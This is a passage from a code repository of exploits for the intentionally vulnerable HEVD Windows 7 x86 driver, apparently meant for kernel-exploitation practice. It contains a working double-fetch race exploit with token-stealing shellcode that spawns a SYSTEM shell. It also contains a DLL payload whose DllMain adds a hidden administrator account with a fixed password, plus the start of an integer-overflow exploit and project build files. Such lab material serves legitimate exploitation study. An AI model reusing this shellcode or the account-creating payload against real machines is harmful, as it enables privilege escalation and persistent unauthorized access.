160 | {
161 | return true;
162 | }
163 | else
164 | {
165 | return false;
166 | }
167 | }
168 |
169 | static bool SpawnShell()
170 | {
171 | string ApplicationName = "C:\\Windows\\System32\\cmd.exe";
172 | SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
173 | SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES();
174 | uint CREATE_NEW_CONSOLE = 0x00000010;
175 | string CurrentDirectory = "C:\\Windows\\System32";
176 | STARTUPINFO si = new STARTUPINFO();
177 | pSec.nLength = Marshal.SizeOf(pSec);
178 | tSec.nLength = Marshal.SizeOf(tSec);
179 |
180 | bool status = CreateProcess(
181 | ApplicationName, null, ref pSec, ref tSec, false,
182 | CREATE_NEW_CONSOLE, IntPtr.Zero, CurrentDirectory,
183 | ref si, out PROCESS_INFORMATION pi);
184 |
185 | if (status)
186 | {
187 | Console.WriteLine("[+] Shell is spawned successfully (PID = {0})", pi.dwProcessId);
188 | WaitForSingleObject(pi.hProcess, 500);
189 | CloseHandle(pi.hProcess);
190 | CloseHandle(pi.hThread);
191 | }
192 | else
193 | {
194 | Console.WriteLine("[!] Failed to spawn shell (code={0})", Marshal.GetLastWin32Error());
195 | }
196 |
197 | return status;
198 | }
199 |
200 | //// Thread function for sending payload
201 | static void ThreadOverflow()
202 | {
203 | uint ioctl = 0x222037;
204 | DoubleFetch.Buffer = PayloadBuffer;
205 | DoubleFetch.Size = 0x200;
206 | int BytesReturned = 0;
207 |
208 | for (uint i = 0; i < 100000; i++)
209 | {
210 | if (IsSystem())
211 | {
212 | return;
213 | }
214 | DeviceIoControl(hDevice, ioctl, ref DoubleFetch, 0, IntPtr.Zero, 0, ref BytesReturned, IntPtr.Zero);
215 | }
216 | return;
217 | }
218 |
219 | //// Thread function for modifying size parameter
220 | static void ThreadSizeChange()
221 | {
222 | for (uint i = 0; i < 100000; i++)
223 | {
224 | if (IsSystem())
225 | {
226 | return;
227 | }
228 | DoubleFetch.Size ^= 0xA24;
229 | }
230 | return;
231 | }
232 |
233 | // Main function
234 | static void Main()
235 | {
236 | byte[] shellcode = {
237 | //--[Setup]
238 | 0x60, // pushad
239 | 0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, // mov eax, fs:[KTHREAD_OFFSET]
240 | 0x8B, 0x40, 0x50, // mov eax, [eax + EPROCESS_OFFSET]
241 | 0x89, 0xC1, // mov ecx, eax (Current _EPROCESS structure)
242 | 0x8B, 0x98, 0xF8, 0x00, 0x00, 0x00, // mov ebx, [eax + TOKEN_OFFSET]
243 | //--[Copy System PID token]
244 | 0xBA, 0x04, 0x00, 0x00, 0x00, // mov edx, 4 (SYSTEM PID)
245 | 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // mov eax, [eax + FLINK_OFFSET] <-|
246 | 0x2D, 0xB8, 0x00, 0x00, 0x00, // sub eax, FLINK_OFFSET |
247 | 0x39, 0x90, 0xB4, 0x00, 0x00, 0x00, // cmp [eax + PID_OFFSET], edx |
248 | 0x75, 0xED, // jnz ->|
249 | 0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00, // mov edx, [eax + TOKEN_OFFSET]
250 | 0x89, 0x91, 0xF8, 0x00, 0x00, 0x00, // mov [ecx + TOKEN_OFFSET], edx
251 | //--[Recover]
252 | 0x61, // popad
253 | 0x5D, // pop ebp
254 | 0xC2, 0x08, 0x00 // ret 8
255 | };
256 |
257 | Console.WriteLine("--[ HEVD Exploitation : Double Fetch\n");
258 |
259 | if (!IsWin7x86())
260 | {
261 | return;
262 | }
263 |
264 | int NumberOfCPU = Environment.ProcessorCount;
265 | Console.WriteLine("[>] Number of CPU: {0}", NumberOfCPU);
266 |
267 | if (NumberOfCPU < 2)
268 | {
269 | Console.WriteLine("[-] This exploit requires 2 CPUs");
270 | return;
271 | }
272 | Console.WriteLine("[>] CPU number requirement is satisfied");
273 |
274 | // Step 1: Allocate Token Stealing Shellcode
275 | uint dwSize = 0x1000;
276 | uint MEM_COMMIT = 0x00001000;
277 | uint MEM_RESERVE = 0x00002000;
278 | uint PAGE_EXECUTE_READWRITE = 0x40;
279 |
280 | Console.WriteLine("[>] Trying to allocate shellcode");
281 | ShellcodeBuffer = VirtualAlloc(IntPtr.Zero, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
282 |
283 | if (ShellcodeBuffer == IntPtr.Zero)
284 | {
285 | Console.WriteLine("[-] Failed to VirtualAlloc (code={0})", Marshal.GetLastWin32Error());
286 | return;
287 | }
288 |
289 | Console.WriteLine("[+] Allocated {0} bytes buffer at 0x{1}", dwSize, ShellcodeBuffer.ToString("X8"));
290 | Marshal.Copy(shellcode, 0, ShellcodeBuffer, shellcode.Length);
291 | Console.WriteLine("[+] Shellcode is allocated at 0x{0}", ShellcodeBuffer.ToString("X8"));
292 |
293 | // Step 2: Prepare payload for overwriting kernel pointer
294 | byte[] offset = Encoding.ASCII.GetBytes(new string('A', 0x820));
295 | byte[] pointer = BitConverter.GetBytes(ShellcodeBuffer.ToInt32());
296 | byte[] payload = new byte[offset.Length + pointer.Length];
297 | offset.CopyTo(payload, 0);
298 | pointer.CopyTo(payload, offset.Length);
299 |
300 | Console.WriteLine("[>] Preparing payload");
301 | PayloadBuffer = VirtualAlloc(IntPtr.Zero, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
302 |
303 | if (PayloadBuffer == IntPtr.Zero)
304 | {
305 | Console.WriteLine("[-] Failed to VirtualAlloc (code={0})", Marshal.GetLastWin32Error());
306 | return;
307 | }
308 |
309 | Console.WriteLine("[+] Allocated {0} bytes buffer at 0x{1}", dwSize, PayloadBuffer.ToString("X8"));
310 | Marshal.Copy(payload, 0, PayloadBuffer, payload.Length);
311 | Console.WriteLine("[+] Payload is allocated at 0x{0}", PayloadBuffer.ToString("X8"));
312 |
313 | // Step 3: Open driver's handle
314 | string deviceName = "\\\\.\\HacksysExtremeVulnerableDriver";
315 | uint GENERIC_READ = 0x80000000;
316 | uint GENERIC_WRITE = 0x40000000;
317 | uint FILE_SHARE_READ = 0x00000001;
318 | uint FILE_SHARE_WRITE = 0x00000002;
319 | uint OPEN_EXISTING = 0x3;
320 | uint FILE_ATTRIBUTE_NORMAL = 0x80;
321 | uint FILE_FLAG_OVERWRAPPED = 0x40000000;
322 | IntPtr invalid = new IntPtr(-1);
323 |
324 | Console.WriteLine("[>] Opening {0}", deviceName);
325 | hDevice = CreateFile(
326 | deviceName, GENERIC_READ | GENERIC_WRITE,
327 | FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero,
328 | OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERWRAPPED, IntPtr.Zero);
329 |
330 | if (hDevice == invalid)
331 | {
332 | Console.WriteLine("[-] Failed to open {0} (code={1})", deviceName, Marshal.GetLastWin32Error());
333 | return;
334 | }
335 |
336 | Console.WriteLine("[+] HEVD.sys is opened succesfuly (hDevice = 0x{0})", hDevice.ToString("X"));
337 |
338 | // Step 4: Trigger double fetch to stack overflow
339 | Thread ioctl_thread = new Thread(new ThreadStart(ThreadOverflow));
340 | Thread race_thread = new Thread(new ThreadStart(ThreadSizeChange));
341 |
342 | Console.WriteLine("[>] Triggering double fetch");
343 | ioctl_thread.Start();
344 | race_thread.Start();
345 | ioctl_thread.Join();
346 | race_thread.Join();
347 | CleanUp();
348 |
349 | // Step 5: Spawn SYSTEM shell
350 | if (IsSystem() && SpawnShell())
351 | {
352 | Console.WriteLine("[+] Exploit is completed successfully");
353 | }
354 | else
355 | {
356 | Console.WriteLine("[-] Failed to exploit");
357 | }
358 | }
359 | }
360 | }
--------------------------------------------------------------------------------
/HEVD_Win7x86/DoubleFetch/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DoubleFetch")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DoubleFetch")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("c3fded0a-dd87-4d37-99f5-1e679bd831ad")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/HEVD_Win7x86.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31624.102
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "StackOverflow", "StackOverflow\StackOverflow.csproj", "{F11DCD73-3213-4687-ADD0-198D6BFC225F}"
7 | EndProject
8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "StackOverflowGS", "StackOverflowGS\StackOverflowGS.csproj", "{47ED8C95-0E1B-43DE-9EC4-12505C263168}"
9 | EndProject
10 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DoubleFetch", "DoubleFetch\DoubleFetch.csproj", "{C3FDED0A-DD87-4D37-99F5-1E679BD831AD}"
11 | EndProject
12 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "NullPointerDereference", "NullPointerDereference\NullPointerDereference.csproj", "{F94165C3-2308-46DE-9D72-DC71C96E537A}"
13 | EndProject
14 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "IntegerOverflow", "IntegerOverflow\IntegerOverflow.csproj", "{22CE436A-76BF-46D8-B7DC-86330B55C523}"
15 | EndProject
16 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "TypeConfusion", "TypeConfusion\TypeConfusion.csproj", "{EC2F5921-ACA8-4F8F-AF6A-F238E0AA61DD}"
17 | EndProject
18 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PoolOverflow", "PoolOverflow\PoolOverflow.csproj", "{48DA5A78-6F29-44D8-8366-E7017B2BFF14}"
19 | EndProject
20 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "UseAfterFree", "UseAfterFree\UseAfterFree.csproj", "{22FAC2CB-DC33-4345-816E-1B0CAA429484}"
21 | EndProject
22 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "UninitializedStackVariable", "UninitializedStackVariable\UninitializedStackVariable.csproj", "{D583FB11-8F46-410A-ABF3-45CE8C5966CA}"
23 | EndProject
24 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "WriteWhatWhere", "WriteWhatWhere\WriteWhatWhere.csproj", "{24B73675-FD84-4DB4-9F28-F6FB085450C4}"
25 | EndProject
26 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "WriteWhatWhereGDI", "WriteWhatWhereGDI\WriteWhatWhereGDI.csproj", "{FDD121CE-E7EC-4ED4-909C-7B4191B0D6A5}"
27 | EndProject
28 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "WriteNull", "WriteNull\WriteNull.csproj", "{2BBA4088-90C0-48E7-B68B-205BF5FD1E7E}"
29 | EndProject
30 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "UninitializedHeapVariable", "UninitializedHeapVariable\UninitializedHeapVariable.csproj", "{8CF9A838-5690-4DA3-AE5D-8043CE1FA141}"
31 | EndProject
32 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InjectLib", "InjectLib\InjectLib.vcxproj", "{7D0A2423-B3E8-4E03-9CD9-38F31FD022B0}"
33 | EndProject
34 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "InsecureKernelResourceAccess", "InsecureKernelResourceAccess\InsecureKernelResourceAccess.csproj", "{A3AFFC5E-B6FF-42AC-8EA0-7AFDA96EA3F1}"
35 | EndProject
36 | Global
37 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
38 | Debug|x86 = Debug|x86
39 | Release|x86 = Release|x86
40 | EndGlobalSection
41 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
42 | {F11DCD73-3213-4687-ADD0-198D6BFC225F}.Debug|x86.ActiveCfg = Debug|x86
43 | {F11DCD73-3213-4687-ADD0-198D6BFC225F}.Debug|x86.Build.0 = Debug|x86
44 | {F11DCD73-3213-4687-ADD0-198D6BFC225F}.Release|x86.ActiveCfg = Release|x86
45 | {F11DCD73-3213-4687-ADD0-198D6BFC225F}.Release|x86.Build.0 = Release|x86
46 | {47ED8C95-0E1B-43DE-9EC4-12505C263168}.Debug|x86.ActiveCfg = Debug|x86
47 | {47ED8C95-0E1B-43DE-9EC4-12505C263168}.Debug|x86.Build.0 = Debug|x86
48 | {47ED8C95-0E1B-43DE-9EC4-12505C263168}.Release|x86.ActiveCfg = Release|x86
49 | {47ED8C95-0E1B-43DE-9EC4-12505C263168}.Release|x86.Build.0 = Release|x86
50 | {C3FDED0A-DD87-4D37-99F5-1E679BD831AD}.Debug|x86.ActiveCfg = Debug|x86
51 | {C3FDED0A-DD87-4D37-99F5-1E679BD831AD}.Debug|x86.Build.0 = Debug|x86
52 | {C3FDED0A-DD87-4D37-99F5-1E679BD831AD}.Release|x86.ActiveCfg = Release|x86
53 | {C3FDED0A-DD87-4D37-99F5-1E679BD831AD}.Release|x86.Build.0 = Release|x86
54 | {F94165C3-2308-46DE-9D72-DC71C96E537A}.Debug|x86.ActiveCfg = Debug|x86
55 | {F94165C3-2308-46DE-9D72-DC71C96E537A}.Debug|x86.Build.0 = Debug|x86
56 | {F94165C3-2308-46DE-9D72-DC71C96E537A}.Release|x86.ActiveCfg = Release|x86
57 | {F94165C3-2308-46DE-9D72-DC71C96E537A}.Release|x86.Build.0 = Release|x86
58 | {22CE436A-76BF-46D8-B7DC-86330B55C523}.Debug|x86.ActiveCfg = Debug|x86
59 | {22CE436A-76BF-46D8-B7DC-86330B55C523}.Debug|x86.Build.0 = Debug|x86
60 | {22CE436A-76BF-46D8-B7DC-86330B55C523}.Release|x86.ActiveCfg = Release|x86
61 | {22CE436A-76BF-46D8-B7DC-86330B55C523}.Release|x86.Build.0 = Release|x86
62 | {EC2F5921-ACA8-4F8F-AF6A-F238E0AA61DD}.Debug|x86.ActiveCfg = Debug|x86
63 | {EC2F5921-ACA8-4F8F-AF6A-F238E0AA61DD}.Debug|x86.Build.0 = Debug|x86
64 | {EC2F5921-ACA8-4F8F-AF6A-F238E0AA61DD}.Release|x86.ActiveCfg = Release|x86
65 | {EC2F5921-ACA8-4F8F-AF6A-F238E0AA61DD}.Release|x86.Build.0 = Release|x86
66 | {48DA5A78-6F29-44D8-8366-E7017B2BFF14}.Debug|x86.ActiveCfg = Debug|x86
67 | {48DA5A78-6F29-44D8-8366-E7017B2BFF14}.Debug|x86.Build.0 = Debug|x86
68 | {48DA5A78-6F29-44D8-8366-E7017B2BFF14}.Release|x86.ActiveCfg = Release|x86
69 | {48DA5A78-6F29-44D8-8366-E7017B2BFF14}.Release|x86.Build.0 = Release|x86
70 | {22FAC2CB-DC33-4345-816E-1B0CAA429484}.Debug|x86.ActiveCfg = Debug|x86
71 | {22FAC2CB-DC33-4345-816E-1B0CAA429484}.Debug|x86.Build.0 = Debug|x86
72 | {22FAC2CB-DC33-4345-816E-1B0CAA429484}.Release|x86.ActiveCfg = Release|x86
73 | {22FAC2CB-DC33-4345-816E-1B0CAA429484}.Release|x86.Build.0 = Release|x86
74 | {D583FB11-8F46-410A-ABF3-45CE8C5966CA}.Debug|x86.ActiveCfg = Debug|x86
75 | {D583FB11-8F46-410A-ABF3-45CE8C5966CA}.Debug|x86.Build.0 = Debug|x86
76 | {D583FB11-8F46-410A-ABF3-45CE8C5966CA}.Release|x86.ActiveCfg = Release|x86
77 | {D583FB11-8F46-410A-ABF3-45CE8C5966CA}.Release|x86.Build.0 = Release|x86
78 | {24B73675-FD84-4DB4-9F28-F6FB085450C4}.Debug|x86.ActiveCfg = Debug|x86
79 | {24B73675-FD84-4DB4-9F28-F6FB085450C4}.Debug|x86.Build.0 = Debug|x86
80 | {24B73675-FD84-4DB4-9F28-F6FB085450C4}.Release|x86.ActiveCfg = Release|x86
81 | {24B73675-FD84-4DB4-9F28-F6FB085450C4}.Release|x86.Build.0 = Release|x86
82 | {FDD121CE-E7EC-4ED4-909C-7B4191B0D6A5}.Debug|x86.ActiveCfg = Debug|x86
83 | {FDD121CE-E7EC-4ED4-909C-7B4191B0D6A5}.Debug|x86.Build.0 = Debug|x86
84 | {FDD121CE-E7EC-4ED4-909C-7B4191B0D6A5}.Release|x86.ActiveCfg = Release|x86
85 | {FDD121CE-E7EC-4ED4-909C-7B4191B0D6A5}.Release|x86.Build.0 = Release|x86
86 | {2BBA4088-90C0-48E7-B68B-205BF5FD1E7E}.Debug|x86.ActiveCfg = Debug|x86
87 | {2BBA4088-90C0-48E7-B68B-205BF5FD1E7E}.Debug|x86.Build.0 = Debug|x86
88 | {2BBA4088-90C0-48E7-B68B-205BF5FD1E7E}.Release|x86.ActiveCfg = Release|x86
89 | {2BBA4088-90C0-48E7-B68B-205BF5FD1E7E}.Release|x86.Build.0 = Release|x86
90 | {8CF9A838-5690-4DA3-AE5D-8043CE1FA141}.Debug|x86.ActiveCfg = Debug|x86
91 | {8CF9A838-5690-4DA3-AE5D-8043CE1FA141}.Debug|x86.Build.0 = Debug|x86
92 | {8CF9A838-5690-4DA3-AE5D-8043CE1FA141}.Release|x86.ActiveCfg = Release|x86
93 | {8CF9A838-5690-4DA3-AE5D-8043CE1FA141}.Release|x86.Build.0 = Release|x86
94 | {7D0A2423-B3E8-4E03-9CD9-38F31FD022B0}.Debug|x86.ActiveCfg = Debug|Win32
95 | {7D0A2423-B3E8-4E03-9CD9-38F31FD022B0}.Debug|x86.Build.0 = Debug|Win32
96 | {7D0A2423-B3E8-4E03-9CD9-38F31FD022B0}.Release|x86.ActiveCfg = Release|Win32
97 | {7D0A2423-B3E8-4E03-9CD9-38F31FD022B0}.Release|x86.Build.0 = Release|Win32
98 | {A3AFFC5E-B6FF-42AC-8EA0-7AFDA96EA3F1}.Debug|x86.ActiveCfg = Debug|x86
99 | {A3AFFC5E-B6FF-42AC-8EA0-7AFDA96EA3F1}.Debug|x86.Build.0 = Debug|x86
100 | {A3AFFC5E-B6FF-42AC-8EA0-7AFDA96EA3F1}.Release|x86.ActiveCfg = Release|x86
101 | {A3AFFC5E-B6FF-42AC-8EA0-7AFDA96EA3F1}.Release|x86.Build.0 = Release|x86
102 | EndGlobalSection
103 | GlobalSection(SolutionProperties) = preSolution
104 | HideSolutionNode = FALSE
105 | EndGlobalSection
106 | GlobalSection(ExtensibilityGlobals) = postSolution
107 | SolutionGuid = {C78CEAD1-4736-446E-BBA4-A6F4B96DAC71}
108 | EndGlobalSection
109 | EndGlobal
110 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/InjectLib/InjectLib.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 |
14 | 16.0
15 | Win32Proj
16 | {7d0a2423-b3e8-4e03-9cd9-38f31fd022b0}
17 | InjectLib
18 | 10.0
19 |
20 |
21 |
22 | DynamicLibrary
23 | true
24 | v142
25 | Unicode
26 |
27 |
28 | DynamicLibrary
29 | false
30 | v142
31 | true
32 | Unicode
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 | true
48 | $(SolutionDir)bin\x86\$(Configuration)\
49 |
50 |
51 | false
52 | $(SolutionDir)bin\x86\$(Configuration)\
53 |
54 |
55 |
56 | Level3
57 | true
58 | WIN32;_DEBUG;INJECTLIB_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
59 | true
60 | Use
61 | pch.h
62 |
63 |
64 | Windows
65 | true
66 | false
67 |
68 |
69 |
70 |
71 | Level3
72 | true
73 | true
74 | true
75 | WIN32;NDEBUG;INJECTLIB_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
76 | true
77 | Use
78 | pch.h
79 |
80 |
81 | Windows
82 | true
83 | true
84 | true
85 | false
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 | Create
96 | Create
97 |
98 |
99 |
100 |
101 |
102 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/InjectLib/InjectLib.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 |
26 |
27 | Source Files
28 |
29 |
30 | Source Files
31 |
32 |
33 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/InjectLib/InjectLib.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/InjectLib/dllmain.cpp:
--------------------------------------------------------------------------------
1 | #include "pch.h"
2 |
3 | extern "C" {
4 | __declspec(dllexport) BOOL ExecuteCommand(wchar_t cmd[])
5 | {
6 | wchar_t currentDirectory[] = L"C:\\Windows\\System32";
7 | STARTUPINFO si;
8 | PROCESS_INFORMATION pi;
9 |
10 | ZeroMemory(&si, sizeof(si));
11 | si.cb = sizeof(si);
12 | ZeroMemory(&pi, sizeof(pi));
13 |
14 | BOOL status = ::CreateProcess(
15 | NULL,
16 | cmd,
17 | NULL,
18 | NULL,
19 | FALSE,
20 | CREATE_NEW_CONSOLE,
21 | NULL,
22 | currentDirectory,
23 | &si,
24 | &pi);
25 |
26 | if (status)
27 | {
28 | ::WaitForSingleObject(pi.hProcess, -1);
29 | ::CloseHandle(pi.hProcess);
30 | ::CloseHandle(pi.hThread);
31 | }
32 |
33 | return status;
34 | }
35 | }
36 |
37 | BOOL APIENTRY DllMain(HMODULE hModule,
38 | DWORD dwReason,
39 | LPVOID lpReserved
40 | ) {
41 | if (dwReason == DLL_PROCESS_ATTACH)
42 | {
43 | wchar_t adduser[] = L"C:\\Windows\\System32\\net.exe user hevdtest Password123! /add";
44 | wchar_t addgroup[] = L"C:\\Windows\\System32\\net.exe localgroup Administrators hevdtest /add";
45 | ExecuteCommand(adduser);
46 | ExecuteCommand(addgroup);
47 | }
48 | return TRUE;
49 | }
50 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/InjectLib/framework.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
4 | // Windows Header Files
5 | #include
6 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/InjectLib/pch.cpp:
--------------------------------------------------------------------------------
1 | // pch.cpp: source file corresponding to the pre-compiled header
2 |
3 | #include "pch.h"
4 |
5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed.
6 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/InjectLib/pch.h:
--------------------------------------------------------------------------------
1 | // pch.h: This is a precompiled header file.
2 | // Files listed below are compiled only once, improving build performance for future builds.
3 | // This also affects IntelliSense performance, including code completion and many code browsing features.
4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds.
5 | // Do not add files here that you will be updating frequently as this negates the performance advantage.
6 |
7 | #ifndef PCH_H
8 | #define PCH_H
9 |
10 | // add headers that you want to pre-compile here
11 | #include "framework.h"
12 |
13 | #endif //PCH_H
14 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/InsecureKernelResourceAccess/InsecureKernelResourceAccess.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {A3AFFC5E-B6FF-42AC-8EA0-7AFDA96EA3F1}
8 | Exe
9 | InsecureKernelResourceAccess
10 | InsecureKernelResourceAccess
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 | true
17 | ..\bin\x86\Debug\
18 | DEBUG;TRACE
19 | full
20 | x86
21 | 7.3
22 | prompt
23 |
24 |
25 | ..\bin\x86\Release\
26 | TRACE
27 | true
28 | pdbonly
29 | x86
30 | 7.3
31 | prompt
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/InsecureKernelResourceAccess/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("InsecureKernelResourceAccess")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("InsecureKernelResourceAccess")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("a3affc5e-b6ff-42ac-8ea0-7afda96ea3f1")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/IntegerOverflow/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/IntegerOverflow/IntegerOverflow.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {22CE436A-76BF-46D8-B7DC-86330B55C523}
8 | Exe
9 | IntegerOverflow
10 | IntegerOverflow
11 | v2.0
12 | 512
13 | true
14 |
15 |
16 |
17 | x86
18 | ..\bin\x86\Debug\
19 |
20 |
21 | x86
22 | ..\bin\x86\Release\
23 | TRACE
24 | true
25 | pdbonly
26 | true
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/IntegerOverflow/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | using System.Text;
4 |
5 | namespace IntegerOverflow
6 | {
7 | class Program
8 | {
9 | [StructLayout(LayoutKind.Sequential)]
10 | struct SECURITY_ATTRIBUTES
11 | {
12 | public int nLength;
13 | public IntPtr lpSecurityDescriptor;
14 | public int bInheritHandle;
15 | }
16 |
17 | [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
18 | struct STARTUPINFO
19 | {
20 | public int cb;
21 | public string lpReserved;
22 | public string lpDesktop;
23 | public string lpTitle;
24 | public int dwX;
25 | public int dwY;
26 | public int dwXSize;
27 | public int dwYSize;
28 | public int dwXCountChars;
29 | public int dwYCountChars;
30 | public int dwFillAttribute;
31 | public int dwFlags;
32 | public short wShowWindow;
33 | public short cbReserved2;
34 | public IntPtr lpReserved2;
35 | public IntPtr hStdInput;
36 | public IntPtr hStdOutput;
37 | public IntPtr hStdError;
38 | }
39 |
40 | [StructLayout(LayoutKind.Sequential)]
41 | struct PROCESS_INFORMATION
42 | {
43 | public IntPtr hProcess;
44 | public IntPtr hThread;
45 | public int dwProcessId;
46 | public int dwThreadId;
47 | }
48 |
49 | [DllImport("ntdll.dll")]
50 | static extern void RtlGetNtVersionNumbers(
51 | ref int MajorVersion,
52 | ref int MinorVersion,
53 | ref int BuildNumber);
54 |
55 | [DllImport("kernel32.dll", SetLastError = true)]
56 | static extern IntPtr VirtualAlloc(
57 | IntPtr lpAddress,
58 | uint dwSize,
59 | uint flAllocationType,
60 | uint flProtect);
61 |
62 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
